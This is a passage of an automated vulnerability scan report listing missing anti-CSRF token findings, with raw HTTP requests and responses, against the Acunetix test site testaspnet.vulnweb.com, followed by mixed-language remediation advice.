          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="about.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        17. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        18. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnLogin" "cbPersistCookie" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
